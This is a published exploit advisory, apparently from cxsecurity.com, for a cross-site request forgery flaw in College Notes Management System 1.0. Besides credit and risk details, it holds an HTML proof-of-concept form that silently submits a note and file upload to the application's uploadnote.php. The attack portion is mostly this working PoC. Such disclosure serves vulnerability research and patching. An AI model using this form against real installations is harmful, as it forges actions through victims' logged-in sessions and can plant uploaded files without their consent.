College Notes Management System 1.0 Cross Site Request Forgery

2019.08.04
Credit: Mr Winst0n
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: College Notes Management System 1.0 - CSRF (Add Note) # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan@gmail.com # Discovery Date: August 3, 2019 # Vendor Homepage: https://anirbandutta.ml/ # Software Link: https://sourceforge.net/projects/college-notes-management/ # Software Link: https://github.com/anirbandutta9/College-Notes-Gallery # Tested Version: 1.0 # Tested on: Parrot OS # PoC: <form role="form" action="http://localhost/[PATH]/dashboard/uploadnote.php" method="POST" enctype="multipart/form-data"> <div class="form-group"> <label for="post_title">Note Title</label> <input type="text" name="title" class="form-control" placeholder="Eg: Php Tutorial File" value="" required=""> </div> <div class="form-group"> <label for="post_tags">Short Note Description</label> <input type="text" name="description" class="form-control" placeholder="Eg: Php Tutorial File includes basic php programming ...." value="" required="" "=""> </div> <div class="form-group"> <label for="post_image">Select File</label><font color="brown"> (allowed file type: 'pdf','doc','ppt','txt','zip' | allowed maximum size: 30 mb ) </font> <input type="file" name="file"> </div> <button type="submit" name="upload" class="btn btn-primary" value="Upload Note">Upload Note</button><br><br> </form>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top